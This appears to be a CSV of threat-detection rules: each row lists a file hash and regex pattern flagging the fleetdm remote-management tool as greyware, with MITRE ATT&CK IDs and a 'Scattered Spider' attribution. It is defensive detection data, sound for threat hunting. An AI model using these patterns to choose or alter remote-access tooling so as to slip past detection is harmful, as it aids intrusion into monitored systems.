"*72d4be0337fe92dda02f3828e2f1f7df290a1c079e81ef3873d9c0502bbe90a3*",".{0,1000}72d4be0337fe92dda02f3828e2f1f7df290a1c079e81ef3873d9c0502bbe90a3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*74d130cad8acef03e4faa3b5befcb1351db038fa47421d6a5d3010f583ab0e47*",".{0,1000}74d130cad8acef03e4faa3b5befcb1351db038fa47421d6a5d3010f583ab0e47.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*763e2f8597ef969c08a17932f0d4e10424b478314ceddbf72ba13a5d41aa8df0*",".{0,1000}763e2f8597ef969c08a17932f0d4e10424b478314ceddbf72ba13a5d41aa8df0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*770ca5efa95e4c0a44f8f1653c41d79c9fe55d0e9a228eb2d374bdd8a11a63f7*",".{0,1000}770ca5efa95e4c0a44f8f1653c41d79c9fe55d0e9a228eb2d374bdd8a11a63f7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*7a64765efe8fe0d9f6a346e5f38aae30a3534f931e539890114aea698d8960cb*",".{0,1000}7a64765efe8fe0d9f6a346e5f38aae30a3534f931e539890114aea698d8960cb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*7b5de4f0a090f29dd3d63a3d773b792cb059e2b39497ff4d633fcabb2afbc297*",".{0,1000}7b5de4f0a090f29dd3d63a3d773b792cb059e2b39497ff4d633fcabb2afbc297.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*7b89ba929cc86c0b945cef5168476ba82ac80d19c9c2111d816643eb453cb14d*",".{0,1000}7b89ba929cc86c0b945cef5168476ba82ac80d19c9c2111d816643eb453cb14d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*7c26189a98e1b82293fa72a8a88725ecce3d38622480e5809b8bec9fca407ab1*",".{0,1000}7c26189a98e1b82293fa72a8a88725ecce3d38622480e5809b8bec9fca407ab1.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*7d49e7215481d044c66c2af30c063b4253e2086be6b20f6c99142ad3b6fb4fbe*",".{0,1000}7d49e7215481d044c66c2af30c063b4253e2086be6b20f6c99142ad3b6fb4fbe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*7d602aa3b76b0aae9dd6771e6451d3aa23b89f46ff115b0096b9074d110e2877*",".{0,1000}7d602aa3b76b0aae9dd6771e6451d3aa23b89f46ff115b0096b9074d110e2877.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*7d739b6a0667be4e84dff7ad01ae6db2369aac0bb8685d1eafb74a239cf3dde4*",".{0,1000}7d739b6a0667be4e84dff7ad01ae6db2369aac0bb8685d1eafb74a239cf3dde4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*7f08d1c537cc683674c8b85e02ba5ae0513a779fc416c687f82a1b0eba4010d8*",".{0,1000}7f08d1c537cc683674c8b85e02ba5ae0513a779fc416c687f82a1b0eba4010d8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*7fab6b56cc09d922c7160833d912a2a23ac61ae9d6dc1156d8228bc2c03f5059*",".{0,1000}7fab6b56cc09d922c7160833d912a2a23ac61ae9d6dc1156d8228bc2c03f5059.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*80cd76926ec4cf711da761f81d469824ebfc21388b3e062fee509ea087f23a5a*",".{0,1000}80cd76926ec4cf711da761f81d469824ebfc21388b3e062fee509ea087f23a5a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*811febc6169517fbd42233cdc003fcaf660f1ee969fcea98261647274ae27f2a*",".{0,1000}811febc6169517fbd42233cdc003fcaf660f1ee969fcea98261647274ae27f2a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*81336615ec3491b5ef7770fefaaa4c955dc1bc123d79bb90b24a86989c95aa86*",".{0,1000}81336615ec3491b5ef7770fefaaa4c955dc1bc123d79bb90b24a86989c95aa86.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*82d32160a4bc234ba3e1d34412e65ee7a74c904df4156a896f71c422a103abd6*",".{0,1000}82d32160a4bc234ba3e1d34412e65ee7a74c904df4156a896f71c422a103abd6.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*84bd394d27a36a89e86a265dd05d14d4747f16ec916044fec21ec113bf96a1c4*",".{0,1000}84bd394d27a36a89e86a265dd05d14d4747f16ec916044fec21ec113bf96a1c4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*85f0b24d9e734c48dfe285aece6b7decb23eaa976590245adf67e43b1bc222d1*",".{0,1000}85f0b24d9e734c48dfe285aece6b7decb23eaa976590245adf67e43b1bc222d1.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*86f533145306e79ccdbe21d0b46326ae9fab9507f3a1740d0ffc8a088ce18d02*",".{0,1000}86f533145306e79ccdbe21d0b46326ae9fab9507f3a1740d0ffc8a088ce18d02.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*87759dcbffdc166d166545937d55787701b69197a7138ac01850f661f2dceed4*",".{0,1000}87759dcbffdc166d166545937d55787701b69197a7138ac01850f661f2dceed4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*881f6c9e3c1e70dd076b850c146352b733957e1ef90a76c46595631f2cd5ff7c*",".{0,1000}881f6c9e3c1e70dd076b850c146352b733957e1ef90a76c46595631f2cd5ff7c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*8a51f608a0c289334d341590a8b59fce757f07fd112aaa5459fc9c51891b5e60*",".{0,1000}8a51f608a0c289334d341590a8b59fce757f07fd112aaa5459fc9c51891b5e60.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*8a589ad4b3ec87077fb149d95a7c53d4a9422c2270b8d83a17c2ae0e2bcc816f*",".{0,1000}8a589ad4b3ec87077fb149d95a7c53d4a9422c2270b8d83a17c2ae0e2bcc816f.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*8a9035a8ebb7500049aacb7291c559d29a2db2024cfdac39fbdd6ff277dc2764*",".{0,1000}8a9035a8ebb7500049aacb7291c559d29a2db2024cfdac39fbdd6ff277dc2764.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*8c1b2481e4dfe27c73d6446784fae2b9d2c7d27c11e0a19b081e877a38d08c94*",".{0,1000}8c1b2481e4dfe27c73d6446784fae2b9d2c7d27c11e0a19b081e877a38d08c94.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*8c38c4c17d8d8382d9fe1f98db556bca3cfeb3fef0359d9d7c01ab73477b4a48*",".{0,1000}8c38c4c17d8d8382d9fe1f98db556bca3cfeb3fef0359d9d7c01ab73477b4a48.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*8d16dbb3c90052e4a2644008d40b65813912d7b117ab6f8c65e886f2881361c2*",".{0,1000}8d16dbb3c90052e4a2644008d40b65813912d7b117ab6f8c65e886f2881361c2.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*8ddb38319fb34f580a0f3732fcf3f40b13c2b562fd676b189481e1cc0e361381*",".{0,1000}8ddb38319fb34f580a0f3732fcf3f40b13c2b562fd676b189481e1cc0e361381.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*8f798e081ea1cb1e106552ab9a7241994d3c05dd18970f3e1ad8329d3738bd7e*",".{0,1000}8f798e081ea1cb1e106552ab9a7241994d3c05dd18970f3e1ad8329d3738bd7e.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*9043fcb49a3326bc9887c4a8cff27560c53edf4792fc94024f756a5791da38a8*",".{0,1000}9043fcb49a3326bc9887c4a8cff27560c53edf4792fc94024f756a5791da38a8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*9147ff5871fe6cfb56f5ad85e69570ef5d904a20b4cf8135a59ea687e9efe7b0*",".{0,1000}9147ff5871fe6cfb56f5ad85e69570ef5d904a20b4cf8135a59ea687e9efe7b0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*917759e1b76b72229b5dc928b07af4a4d1f99b41111da42580aeb28ef2aefd3e*",".{0,1000}917759e1b76b72229b5dc928b07af4a4d1f99b41111da42580aeb28ef2aefd3e.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*91aceb4ee71ac847521007ac796e718ad5bb6577c28b5c992e810e2f4e402046*",".{0,1000}91aceb4ee71ac847521007ac796e718ad5bb6577c28b5c992e810e2f4e402046.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*91e7b6bf8831219775f176389103295d7065a7e6eb74c68c1093416be508ba14*",".{0,1000}91e7b6bf8831219775f176389103295d7065a7e6eb74c68c1093416be508ba14.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*92dfe587c369ed8afad29bcb4ae5ed9a313cb563b2e52ff0b0494f15dcd5fd33*",".{0,1000}92dfe587c369ed8afad29bcb4ae5ed9a313cb563b2e52ff0b0494f15dcd5fd33.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*92f34dca0bd5715dbfffcdceeb89ffab9cd8115c2faf07cbd1e34071795cdb44*",".{0,1000}92f34dca0bd5715dbfffcdceeb89ffab9cd8115c2faf07cbd1e34071795cdb44.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*92f9a5bbfd116c4e20227af72b651b95a4190b346cb391762d0d50f5245d3355*",".{0,1000}92f9a5bbfd116c4e20227af72b651b95a4190b346cb391762d0d50f5245d3355.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*94253480a0f1e3be221902d60f94463420057f8d84f9136abd6b7448332a1fe6*",".{0,1000}94253480a0f1e3be221902d60f94463420057f8d84f9136abd6b7448332a1fe6.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*9456bf9d11fd8cee55619fc0a2ffe3443f9bfea51589af5c3b1282dfa50eb2a7*",".{0,1000}9456bf9d11fd8cee55619fc0a2ffe3443f9bfea51589af5c3b1282dfa50eb2a7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*947895eee1492a0f6da5c69fe68361b97359f52f99ac72f7947a456618f0ec7f*",".{0,1000}947895eee1492a0f6da5c69fe68361b97359f52f99ac72f7947a456618f0ec7f.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*9506632b80989310f2d2cca6a35e036d21213776cfff6623c28f1c5d3b8588c7*",".{0,1000}9506632b80989310f2d2cca6a35e036d21213776cfff6623c28f1c5d3b8588c7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*9507e23a60968916342e626ca86fdde847cb30dafbe12a3f50f8854efef0f62e*",".{0,1000}9507e23a60968916342e626ca86fdde847cb30dafbe12a3f50f8854efef0f62e.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*950ecb779365ffc85a6eba98a8d8dd5dfad765692385a2f59bc93ddbf13a489a*",".{0,1000}950ecb779365ffc85a6eba98a8d8dd5dfad765692385a2f59bc93ddbf13a489a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*971a9d100a6bed85f54fa61064075260f64396b2977e716cdd5537f5ab3c5e92*",".{0,1000}971a9d100a6bed85f54fa61064075260f64396b2977e716cdd5537f5ab3c5e92.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*9887df54ec10a12b986c325675b360e2c43924618104c7914928520ede514fa0*",".{0,1000}9887df54ec10a12b986c325675b360e2c43924618104c7914928520ede514fa0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*9b08ea44ec7fa2954c60c82ad8c4d54cdf84f3ea336639445b2b8b1d978551e0*",".{0,1000}9b08ea44ec7fa2954c60c82ad8c4d54cdf84f3ea336639445b2b8b1d978551e0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*9c3262961652f77177675bb812a2e5037223505b780999dc4a57c656afe9e1e6*",".{0,1000}9c3262961652f77177675bb812a2e5037223505b780999dc4a57c656afe9e1e6.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*9d0c7f0c88518e5d682763f7697796846ba0c4156371bfc8df612f38b33b77e3*",".{0,1000}9d0c7f0c88518e5d682763f7697796846ba0c4156371bfc8df612f38b33b77e3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*9dffd0600ac3634e75d99c867d2ca3791cd3a302513c42b4465c6300977d824c*",".{0,1000}9dffd0600ac3634e75d99c867d2ca3791cd3a302513c42b4465c6300977d824c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*9e4a589aa9658c35abbcca54036c9cc0070d05f0708b8df2d8e9030bbb9f541a*",".{0,1000}9e4a589aa9658c35abbcca54036c9cc0070d05f0708b8df2d8e9030bbb9f541a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*9f6fbc95920e22acace881c5702a9fda81104d98ff5f37ed2c343898d371c8b3*",".{0,1000}9f6fbc95920e22acace881c5702a9fda81104d98ff5f37ed2c343898d371c8b3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*9fc6416952495e1c0a13f2b1af1bf774e6dc5a90fcf0a50c942bba56709cb921*",".{0,1000}9fc6416952495e1c0a13f2b1af1bf774e6dc5a90fcf0a50c942bba56709cb921.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a0503d04e1f71f6856503024b70552eeeb6954e4aac61040a008f3917b38a684*",".{0,1000}a0503d04e1f71f6856503024b70552eeeb6954e4aac61040a008f3917b38a684.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a0b1523b50b26c6ceb479513d2278d448d9e826cebbaf2af7decd3e01b5d7a59*",".{0,1000}a0b1523b50b26c6ceb479513d2278d448d9e826cebbaf2af7decd3e01b5d7a59.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a0ffaba8096c1c103f4cadbf7e373d838f5ebca0b1f4a1b4fc600d623c7d4640*",".{0,1000}a0ffaba8096c1c103f4cadbf7e373d838f5ebca0b1f4a1b4fc600d623c7d4640.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a12f1b3315057920742569bb98f5031bfd200c52c6a808b327e5048a4f4991a4*",".{0,1000}a12f1b3315057920742569bb98f5031bfd200c52c6a808b327e5048a4f4991a4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a1d79ad7af2af9ffbcad20b0b5555f6a64d46eb19deada41d93e8becbd4866e3*",".{0,1000}a1d79ad7af2af9ffbcad20b0b5555f6a64d46eb19deada41d93e8becbd4866e3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a220124d70563eb4e79926b0b7ff4bfab36fc29d58b21152455ae1c63bbd5a28*",".{0,1000}a220124d70563eb4e79926b0b7ff4bfab36fc29d58b21152455ae1c63bbd5a28.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a25a28812d135f5a5dbc0a5a697cce19d94acd80913472d3dcc61178f9479e40*",".{0,1000}a25a28812d135f5a5dbc0a5a697cce19d94acd80913472d3dcc61178f9479e40.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
